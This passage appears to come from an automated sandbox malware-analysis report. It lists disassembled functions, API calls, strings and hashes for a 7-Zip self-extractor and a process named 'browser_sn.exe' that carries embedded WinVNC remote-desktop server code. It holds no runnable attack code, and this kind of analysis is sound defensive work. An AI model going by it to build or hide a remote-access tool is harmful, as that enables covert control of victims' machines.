Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118

??3@YAXPAX@Z.MSVCRT(?,?,?,00415778,00415780), ref: 00404168
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00415778,00415780), ref: 00404170
SetWindowTextW.USER32(?,?), ref: 0040417D
??3@YAXPAX@Z.MSVCRT(?), ref: 00404188

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@TextWindow$Length
String ID:
API String ID: 2308334395-0
Opcode ID: 64821f724eaf75f8595ea9ceaa2a55033291bc09f7450cc00c986bb895f50aef
Instruction ID: 4b6459f0461bbe798f755719163b862091937496e8852bb980e1e24ac321b0cc
Opcode Fuzzy Hash: 64821f724eaf75f8595ea9ceaa2a55033291bc09f7450cc00c986bb895f50aef
Instruction Fuzzy Hash: 88F0FF72D00108BACF01BBA1DD47CDE7B78AF18349F50406AF515721A1EA359B959B98

Function 00407916 Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000005C,?), ref: 00407931
CreateFontIndirectW.GDI32(?), ref: 00407947
GetDlgItem.USER32(?,000004B5), ref: 0040795B
SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 00407967

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: CreateFontIndirectItemMessageObjectSend
String ID:
API String ID: 2001801573-0
Opcode ID: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
Instruction ID: 7a034716ce128e2868931ba3036e49d2ca07d686104c333d304994eb71a954cf
Opcode Fuzzy Hash: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
Instruction Fuzzy Hash: B4F05476900704EBE7205BA4DD49FCB7BADAB88B01F108135F911F52D4DBB4E4018B69

Function 00401D8D Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00401D92
GetWindowRect.USER32(?,?), ref: 00401DAB
ScreenToClient.USER32(00000000,?), ref: 00401DB9
ScreenToClient.USER32(00000000,?), ref: 00401DC0

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ClientScreen$ParentRectWindow
String ID:
API String ID: 2099118873-0
Opcode ID: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
Instruction ID: c9a7d6158b24b89f480d793c87918ffc8905022d7cd2aff0562fad3402b16060
Opcode Fuzzy Hash: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
Instruction Fuzzy Hash: 6BE08C73604226ABD7109BA6FC88CCBBFADEFD5762700447AF945A2220C7349C109AB5

Function 00411F01 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 480COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0041212C

Strings

{D@, xrefs: 00411FD8, 00411FEF, 00412002, 00412187, 00412197, 00412276
(nA, xrefs: 00411F5C

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@
String ID: (nA${D@
API String ID: 613200358-2741945119
Opcode ID: 6b06a11e73f06e76f4a00552280f2f7e1c7ff29664b4032982e0d2416b01d521
Instruction ID: 2f127b0a99b440bb22087229e66332d50aa0d3dd2037016e8eed2c3918cb49fd
Opcode Fuzzy Hash: 6b06a11e73f06e76f4a00552280f2f7e1c7ff29664b4032982e0d2416b01d521
Instruction Fuzzy Hash: 8C222771900248DFCB24EF65C9909EEBBB5FF08304F50452FE92A97261DB78A995CF48

Function 00411C05 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

Part of subcall function 0041156F: ??2@YAPAXI@Z.MSVCRT(0000000C,000000FF,00411D35,00416DD8,00000001,?,?,00000000), ref: 00411574

??3@YAXPAX@Z.MSVCRT(00000000,00416DD8,00000001,?,?,00000000), ref: 00411D36

Part of subcall function 0040E036: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
Part of subcall function 0040E036: memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
Part of subcall function 0040E036: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073

??2@YAPAXI@Z.MSVCRT(00000014,00000000,00416DD8,00000001,?,?,00000000), ref: 00411D6E

Strings

{D@, xrefs: 00411C15, 00411C44, 00411C56

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??2@$??3@$memmove
String ID: {D@
API String ID: 4294387087-1160549682
Opcode ID: 97954ea42f8a4878ba2de2a8ca68f1b83589843b80685a5ba565dc0455dd78ce
Instruction ID: 87b977b41272fa9bbbce8bbb083323c071bac7afc4455a16ffe75f8a4777ec8d
Opcode Fuzzy Hash: 97954ea42f8a4878ba2de2a8ca68f1b83589843b80685a5ba565dc0455dd78ce
Instruction Fuzzy Hash: 77B1C471900249DFCB14EFAAD8919DDBBB5FF08304F60412EF919A7261DB38A985CF94

Function 004042EA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 00404310

Strings

GUIFlags, xrefs: 004042EF
^L@, xrefs: 004042EB, 0040430F

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: _wtol
String ID: GUIFlags$^L@
API String ID: 2131799477-2609156739
Opcode ID: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
Instruction ID: e071545e6e42b97a6ff0e24219ab621184b159c44f090b8d4e9d319f90212361
Opcode Fuzzy Hash: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
Instruction Fuzzy Hash: 02F04FB521412386D7342A0995103F7B298EBD47A2FD46437EFC3A21D0C37C4C83926D

Function 00407EBA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00407EEF
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00407F17

Strings

(%d%s), xrefs: 00407EE9

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@wsprintf
String ID: (%d%s)
API String ID: 3815514257-2087557067
Opcode ID: 5f25024aef255d6e4feb710b233e5bb73948a93cc78658359bfd90e81bb857a7
Instruction ID: 7ae1222ccb27522ee32bda146f0754d3921d44b98735208d9557fe66e55c1055
Opcode Fuzzy Hash: 5f25024aef255d6e4feb710b233e5bb73948a93cc78658359bfd90e81bb857a7
Instruction Fuzzy Hash: 2FF09671D00218BFDF21BB55DC46EDEB778EF00308F1081BBB552B15E2DA75AA44CA98

Function 004030EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(?), ref: 004030FB
GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118

Strings

t1@, xrefs: 00403114

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: TextWindow$Length
String ID: t1@
API String ID: 1006428111-473456572
Opcode ID: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
Instruction ID: 8fdd6815b78bf9020f8e78ba054009a9d995117c016d7113bd8aebbbabd1b082
Opcode Fuzzy Hash: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
Instruction Fuzzy Hash: 6FE06D3A204612AFC311AF19D84486FBBBAFFD4311B00447AF841D72A1CB34DC158B90

Function 00404464 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404472

Strings

7-Zip SFX, xrefs: 00404466
Could not allocate memory, xrefs: 0040446B

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: Message
String ID: 7-Zip SFX$Could not allocate memory
API String ID: 2030045667-3806377612
Opcode ID: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
Instruction ID: 20c12d322158c288d9879b49a54fb0f602392e899c52d42c128a52a7ce83e7b7
Opcode Fuzzy Hash: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
Instruction Fuzzy Hash: 79B012703C130C75D50003608C07FC010400B48F03F130412B924E80C1D5E480D0700C

Analysis Process: browser_sn.exePID: 8328, Parent PID: 7724COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.6%
Total number of Nodes:	1045
Total number of Limit Nodes:	47

Executed Functions

Function 00007FF790C536D0 Relevance: 98.9, APIs: 31, Strings: 25, Instructions: 895
librarythreadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00007FF790C5371A
GetCurrentThreadId.KERNEL32 ref: 00007FF790C53764
GetThreadDesktop.USER32 ref: 00007FF790C5376C
_snprintf.LIBCMT ref: 00007FF790C53820
free.LIBCMT ref: 00007FF790C53862
free.LIBCMT ref: 00007FF790C5386F
SleepEx.KERNELBASE ref: 00007FF790C538D5
timeGetTime.WINMM ref: 00007FF790C53A99
EnterCriticalSection.KERNEL32 ref: 00007FF790C53ADF
LeaveCriticalSection.KERNEL32 ref: 00007FF790C53B11
GetComputerNameA.KERNEL32 ref: 00007FF790C53BDC
gethostname.WS2_32 ref: 00007FF790C53C8D
EnterCriticalSection.KERNEL32 ref: 00007FF790C53F3D
CreateRectRgn.GDI32 ref: 00007FF790C53F70
DeleteObject.GDI32 ref: 00007FF790C53F9B
free.LIBCMT ref: 00007FF790C53FA5
LeaveCriticalSection.KERNEL32 ref: 00007FF790C53FAE

Part of subcall function 00007FF790CC7D90: EnterCriticalSection.KERNEL32(?,?,?,00007FF790C53FBC), ref: 00007FF790CC7DA1
Part of subcall function 00007FF790CC7D90: SetThreadPriority.KERNEL32(?,?,?,00007FF790C53FBC), ref: 00007FF790CC7DD5
Part of subcall function 00007FF790CC7D90: GetLastError.KERNEL32(?,?,?,00007FF790C53FBC), ref: 00007FF790CC7DDF

GetTickCount.KERNEL32 ref: 00007FF790C541B3

Part of subcall function 00007FF790C9A5B0: GetCurrentThreadId.KERNEL32 ref: 00007FF790C9A5E1
Part of subcall function 00007FF790C9A5B0: GetThreadDesktop.USER32 ref: 00007FF790C9A5E9
Part of subcall function 00007FF790C9A5B0: OpenInputDesktop.USER32 ref: 00007FF790C9A5FC

OpenInputDesktop.USER32 ref: 00007FF790C5407F
CloseDesktop.USER32 ref: 00007FF790C540C2
CloseDesktop.USER32 ref: 00007FF790C57C4A
Sleep.KERNEL32 ref: 00007FF790C57C8F
FlushFileBuffers.KERNEL32 ref: 00007FF790C57CBC
CloseHandle.KERNEL32 ref: 00007FF790C57CE6
FlushFileBuffers.KERNEL32 ref: 00007FF790C57D1E
CloseHandle.KERNEL32 ref: 00007FF790C57D48
CloseDesktop.USER32 ref: 00007FF790C57D9D
GetModuleFileNameA.KERNEL32 ref: 00007FF790C57E0B
LoadLibraryA.KERNEL32 ref: 00007FF790C57E5D

Part of subcall function 00007FF790C9A3B0: GetCurrentThreadId.KERNEL32 ref: 00007FF790C9A3E3
Part of subcall function 00007FF790C9A3B0: GetThreadDesktop.USER32 ref: 00007FF790C9A3EB
Part of subcall function 00007FF790C9A3B0: GetUserObjectInformationA.USER32 ref: 00007FF790C9A411

GetProcAddress.KERNEL32 ref: 00007FF790C57E75
FreeLibrary.KERNEL32 ref: 00007FF790C57E97

Strings

( , xrefs: 00007FF790C53CF4
WinVNC, xrefs: 00007FF790C53C5C
vncclient.cpp : client connected : %s (%hd), xrefs: 00007FF790C5374A
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C54060
vncclient.cpp : vncClientThread , xrefs: 00007FF790C54029
application mode, xrefs: 00007FF790C53DA2
vncclient.cpp : authenticated connection, xrefs: 00007FF790C53A76
vncservice.cpp : OpenInputdesktop2 , xrefs: 00007FF790C57C66
Could not connect to %s!, xrefs: 00007FF790C5380D
service mode, xrefs: 00007FF790C53D82
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C5404B
vncclient.cpp : client disconnected : %s (%hd), xrefs: 00007FF790C57DE6
\logging.dll, xrefs: 00007FF790C57E38
LOGEXIT, xrefs: 00007FF790C57E6B
Host name unavailable, xrefs: 00007FF790C53CA1
vncservice.cpp : SelectDesktop failed to close desktop, xrefs: 00007FF790C57C54
vncclient.cpp : PostAddNewClient II, xrefs: 00007FF790C57F29
Could not connect using %s!, xrefs: 00007FF790C537F5
vncclient.cpp : sent pixel format to client, xrefs: 00007FF790C53EF5
vncclient.cpp : failed to close desktop, xrefs: 00007FF790C57DA7
vncclient.cpp : PostAddNewClient I, xrefs: 00007FF790C53932
vncclient.cpp : negotiated version, xrefs: 00007FF790C539F9
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C5409A
vncservice.cpp : PostAddNewClient failed, xrefs: 00007FF790C539CA
- , xrefs: 00007FF790C53D62

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCriticalSection$CurrentEnterFilefree$BuffersErrorFlushHandleInputLeaveLibraryNameObjectOpenSleep$AddressComputerCountCreateDeleteFreeInformationLastLoadModeModulePriorityProcRectTickTimeUser_snprintfgethostnametime
String ID: ( $ - $Could not connect to %s!$Could not connect using %s!$Host name unavailable$LOGEXIT$WinVNC$\logging.dll$application mode$service mode$vncclient.cpp : PostAddNewClient I$vncclient.cpp : PostAddNewClient II$vncclient.cpp : authenticated connection$vncclient.cpp : client connected : %s (%hd)$vncclient.cpp : client disconnected : %s (%hd)$vncclient.cpp : failed to close desktop$vncclient.cpp : negotiated version$vncclient.cpp : sent pixel format to client$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : PostAddNewClient failed$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
API String ID: 459429253-3399855497
Opcode ID: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
Instruction ID: d7eca10c8137e4c1bc1bf7bc4a69bd037ce7ae51827cc913cbba458df5a5f805
Opcode Fuzzy Hash: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
Instruction Fuzzy Hash: 75A2AD26628A8185E760EB35C848BFEB7A1FF85B94F854232CA1D477E5DF38E445C720

Function 00007FF790C99BC0 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 105
libraryloaderprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 00007FF790C99C03
GetProcAddress.KERNEL32 ref: 00007FF790C99C1B
GetProcAddress.KERNEL32 ref: 00007FF790C99C2E
GetSystemMetrics.USER32 ref: 00007FF790C99C4E
GetCurrentProcessId.KERNEL32 ref: 00007FF790C99C61
ProcessIdToSessionId.KERNEL32 ref: 00007FF790C99C76
CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF790C99C85
Process32First.KERNEL32 ref: 00007FF790C99CA4
CloseHandle.KERNEL32 ref: 00007FF790C99CB1
FreeLibrary.KERNEL32 ref: 00007FF790C99CBF

Strings

kernel32.dll, xrefs: 00007FF790C99BF2
WTSGetActiveConsoleSessionId, xrefs: 00007FF790C99C11
explorer.exe, xrefs: 00007FF790C99CD0
ProcessIdToSessionId, xrefs: 00007FF790C99C21

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: AddressLibraryProcProcess$CloseCreateCurrentFirstFreeHandleLoadMetricsProcess32SessionSnapshotSystemToolhelp32
String ID: ProcessIdToSessionId$WTSGetActiveConsoleSessionId$explorer.exe$kernel32.dll
API String ID: 1881659197-3751679782
Opcode ID: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
Instruction ID: 91e8bbb0f569948567ced4cadec8c6028761017674ef66aee26b80747b181729
Opcode Fuzzy Hash: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
Instruction Fuzzy Hash: 09412C32A28B4286EB74AB35A8541A9E3E4FF89790F845135D96E077A4EF3CF505C720

Function 00007FF790C99EF0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessWindowStation.USER32 ref: 00007FF790C99F30
GetUserObjectInformationA.USER32 ref: 00007FF790C99F5E
GetLastError.KERNEL32 ref: 00007FF790C99F64
SetLastError.KERNEL32 ref: 00007FF790C99F6C
RevertToSelf.ADVAPI32 ref: 00007FF790C99F79
GetUserNameA.ADVAPI32 ref: 00007FF790C9A008
GetLastError.KERNEL32 ref: 00007FF790C9A012
GetLastError.KERNEL32 ref: 00007FF790C9A044

Strings

vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on , xrefs: 00007FF790C9A01F
vncservice.cpp : getusername error %d, xrefs: 00007FF790C9A04A
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS , xrefs: 00007FF790C9A094
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0, xrefs: 00007FF790C99F7F
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user , xrefs: 00007FF790C99FB7
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s , xrefs: 00007FF790C9A06F
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station , xrefs: 00007FF790C99F3B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ErrorLast$User$InformationNameObjectProcessRevertSelfStationWindow
String ID: vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0$vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s $vncservice.cpp : getusername error %d
API String ID: 3635673080-2232443292
Opcode ID: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
Instruction ID: 209902bd2fbbca93e73538d9ba37316b7fd05d9c4b35a02ec998fdf0a4e8ce30
Opcode Fuzzy Hash: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
Instruction Fuzzy Hash: 0A416E65E2C54392EB20AB39F8402B9E3A1FF85748FC45031D60D867A5EE3DF585C7A0

Function 00007FF790C39D00 Relevance: 15.2, APIs: 10, Instructions: 209
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerA.ADVAPI32 ref: 00007FF790C39DBB
EnumServicesStatusA.ADVAPI32 ref: 00007FF790C39E1D
GetLastError.KERNEL32 ref: 00007FF790C39E2B
EnumServicesStatusA.ADVAPI32 ref: 00007FF790C39E85
OpenServiceA.ADVAPI32 ref: 00007FF790C39EB9
QueryServiceConfigA.ADVAPI32 ref: 00007FF790C39ED7
GetLastError.KERNEL32 ref: 00007FF790C39EE5
QueryServiceConfigA.ADVAPI32 ref: 00007FF790C39F16
CloseServiceHandle.ADVAPI32 ref: 00007FF790C39FCA
CloseServiceHandle.ADVAPI32 ref: 00007FF790C39FF0

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
